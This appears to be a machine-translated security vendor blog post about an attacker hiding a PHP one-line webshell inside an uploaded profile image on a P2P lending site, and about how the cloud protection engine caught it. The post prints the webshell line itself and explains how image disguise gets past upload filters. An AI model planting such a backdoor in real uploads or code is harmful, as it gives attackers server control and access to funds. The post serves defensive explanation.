An expert in the safety circle once said that attack is a kind of "magic." Interestingly, I was in a P2P network loan platform, really see the out of thin air "change" out of money.
P2P loans are the current more convenient and practical means of financing for many small and medium-sized financiers to solve the immediate needs. P2P common mode is provided by the middleman matchmaking platform, while there is a financial hope that others can obtain benefits through loans, on the other side is the demand for loans, the two sides through the middleman to complete the loan transaction. On the one hand, the middleman confirms the background of both parties and, on the other hand, ensures the safety of the lending business. P2P network credit is relying on the network that P2P online trading platform.
Obviously, in the process of P2P loan business, security is very important because it involves money transactions: the lender needs to confirm that the borrower is trustworthy and reliable, and the borrower needs to ensure the safety of the whole lending process and can get down to earth To the funds they need. Therefore, as a trading intermediary P2P platform can guarantee the security of the transaction is crucial.
When it comes to the security of P2P loans, the public's attention will immediately be focused on the safety of both parties involved in the transaction. Whether or not credit transactions can be safely completed is of utmost concern to all. However, the protection of the interests of the key intermediate parties in the P2P service, such as trading platforms, is often overlooked by everyone. Especially for a network of credit platform, especially.
Trading platform how may the interests of damage? As long as there is no fraud, that is, earn more points, less to earn some fees ah! For a P2P lending platform, in the normal network trading environment, it is indeed the case. However, due to the special nature of online loan platform transactions - the introduction of the Internet this factor makes the trading environment becomes more complicated, vulnerable to other factors.
In the Internet environment, P2P network loan business, and the traditional line business is not the same, it is likely to appear in addition to the transaction, the intermediate platform outside the fourth - an attacker. The attacker was unsolicited, and his profitability was often more intense and unscrupulous than the other three parties in the P2P lending business.
The story begins. Now that we are looking at an P2P network loan business from an attacker's point of view, it is certainly a good target for P2P business transactions; however, as an experienced hacker, he is likely to choose a middleman, P2P platform. As we all know, P2P net loan business pursuit of the ultimate goal is to win-win. If attackers are blended in, it is completely different - once the attacker benefits, it will inevitably mean that one or more of the benefits of the normal P2P service is compromised.
Platform business interruption and user information leakage may be everyone most likely to think of business threats. Website is DDoS, the user database is off the library, such an incident is often seen in newspapers. However, P2P network loan platform is an Internet financial platform, more generally, is playing money. Once the hacker choose P2P network loan platform as the target of attack, the goal is often no longer simply denial of service and user information theft, but the money on the platform.
The story begins to be interesting. The safety circle has such a famous saying: Bad guy goes for where the money is. When it comes to P2P platform money, the money in the accounts of both parties is undoubtedly the biggest goal.
That's right, the money in the account. Account money is the temptation, is a Jinshan.
I have a question here, the money in the account come from? This seemingly stupid question may be a joke - of course, is the transaction, or else it is filled into, do not change it?
An expert in the safety circle once said that attack is a kind of "magic." If the attacker is a "magician"? Then how can you not change the money in this account?
Interestingly, I was in a P2P network loan platform, really see the out of thin air "change" out of money. The following may be a bit boring, but I try to use human language to make it easy to understand.
If I say a bunch of space text above actually a picture, you will not hit me? However, it is indeed a picture, that a lot of garbled code is encoded image code. This picture is from a "magician" uploaded to a network loan platform portrait.
Did you see the short text at the top? <? Php @eval ($ _ POST ['pass']);?>? Some base attack and defense students will be happy smile: This is not a Trojan it? Right child, a word of Trojan.
Here by the popularity of what is a Trojan. Trojans are also called backdoors, also known as Webshell. "Web" refers to a web server that opens up web services. "Shell" means the hacker's goal of gaining some level of access to the server. Webshell is often referred to as an attacker gaining some degree of operational access to a web server through a port. Webshell mostly for dynamic script file, also known as the site backdoor tools.
We see above is the php Trojan, precision that php a word picture horse. What is the use of this horse? With less talk nonsense, once a horse is uploaded to a web server by an attacker, it can help hackers gain web server control. If the hacker through the horse to read the database connection file, then your database is his.
The story is now orgasm. Database lost, that is, user information leaked? Please, for a P2P network credit site, others so much effort fee (in fact, do not have too much effort) is for those user information? Of course not, he can freely modify the amount of his account, 1 hundred, 1 thousand, 10,000, 100,000. . . Then transfer or withdraw cash.
To witness the "miracle" of the moment: the attacker "changed" out of money, and net loan website owner eventually to pay for this "miracle." At the beginning of this article, we mentioned that because of the particularity of the Internet environment, the interests of middlemen acting as platforms for network loans may suffer losses due to cyber attacks. The above story provides a true portrayal.
Some friends will ask, is this your story? Really not. The picture above is a real horse that was intercepted by Aliyun a net loan website shortly before. Attackers think they can bypasses the protection of Aliyun as traditional protection systems, upload horses and do not want to be discovered by the cloud shield server protection engine, and immediately call the police. Then we got the horse. After that, we quickly notified the site's manager through the customer service system and provided a solution.
From the attack point of view, in this attack, the attacker's biggest "bright spot" is the Trojan "into" the picture. The purpose of the attacker to do so is to bypass the protection. The traditional method is often to filter and check the script code, the contents of the uploaded image is difficult to verify, often only through the header to determine whether the picture. If you judge by the file header is the picture, then let it by default. Do not want the horse more than enough, cloud shield at the server system level protection engine with script protection rules accurately find and locate the Trojan.
"Magician" organs count, but unfortunately the horse eventually failed to escape YunDun's "palm heart." The interests of P2P net loan website owners are protected.
The story of "Magician and Horse" is coming to an end here. However, the offensive and defensive war between attackers and defenders around Internet finance has just begun. P2P network loans and Internet finance are rapidly developing, during which the offensive and defensive game between attackers and website defenders will continue. Ali cloud shield will also continue to face the challenge of the attacker. However, this decade after the shield will be built in the ongoing battle offensive and defensive become more solid and powerful.